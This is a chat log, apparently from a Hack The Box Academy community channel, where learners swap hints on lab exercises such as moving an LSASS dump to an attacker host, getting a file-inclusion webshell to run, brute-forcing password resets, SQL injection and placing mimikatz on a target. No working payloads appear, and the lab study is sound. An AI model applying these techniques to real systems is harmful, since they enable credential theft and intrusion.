i saw the hint it says i will probably get the password in the lsass , so i assume that i need to transfer the lsass to my attacker host and decrypt it ... so to transfer the lsass i tried .. transferring nc (its not accepting any packets) , scp (did not work) , and i have tried alot to somehow get the lsass to my attacker host but cant .
any hint ?
Hey, stuck on api attacks skills assessment. I have broken access on products but nothing too interesting from there. Then I see a way to reset supplier password , got a list of interesting emails (5) and tried seclists htlm-colors as well as custom wordlist but still can't seem to crack reset their passwords? Could anyone give me a nudge?
also tried sqli there but failed
morning all
Hi, i'm in the Getting Started module of the Penetration Tester path. In the Basic Tools section there's an optional exercise at the end of it, that says to grab the banner of the server. I run this netcat on port 22 and it gives me
SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u7
However when I reveal the answer on the exercise, it says the answer is
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1
Hello
I want to include a screenshot but I think I'm unable to haha
Nevermind, I'm an idiot. I figured it out. TY!
you need to connect your htb account in order to include screenshots
anyone solved file inclusion updated skill assessment
Can you help a bit I got the param got lfi able to read logs put a webshell unable to execute it
..
sure
How we will get it executed
make sure you use the proper quote type :)
I'd focus on trying to abuse an endpoint the resets a password and requires more than one parameter. If that is to broad, you can DM.
Can someone help me out on the graphql module
back and forth might lead you
if you had read the code of contact.php you might see why it fails
some files get decoded and in order to achieve execution you need to send encoded payload
Hey
Android Application Dynamic Analysis > Dynamic Code Instrumentation > Hooking Native Methods is using Frida 16 and Module.findBaseAddress('libangler.so'); in its Code Snippet. However since Frida 17 this method was removed and replaced by Process.getModuleByName('libangler.so').base. Using the Frida 17 approach I'm always getting Error: unable to find module 'libangler.so'. Does someone have a working snippet for this module?
Attacking Windows Credentials... Can someone help me understand how we get mimikatz onto the target system???
Study Transfer methods module
Can someone please help me,I'm stuck on attacking graphql
Can someone nudge me with sql injection skill assessment like after doing the first step I'm struggling to find valid link where sql is vulnerable I tried every damn SQLi discovery on both search boxes
it helps to know the module and section
Basically I got to know which sqli discovery is being blocked by site but I'm still struggling to find the parameter
what is the module name dude.... you saying sqli doesn't narrow shit down LOL
Skill assessment of sql injection
sql injection fundamentals???
there's multiple 'sql injection' modules
Yes man my bad
i take it you found a way to log in already
Yes i did
try manipulating the q
I did and did not get it tbh
Files get converted to something when uploading and for executing try some encoding
Uploading?
Hey bro can I some help on attacking graphql module
In file inclusion. We have to upload the file
There is no upload.php I tried accessing but this page does not exist
Oh okay
There in the pdf
take it to dms so we're not spoiling module content above tier 0
Oh okay going to do it but for reference can I dm so
Sure my bad
Done
in order to have others be able to better help you it's best to at least describe your issue; this can include adding things like basics that you tried, and what section you're working on
I'm working on the first section of the module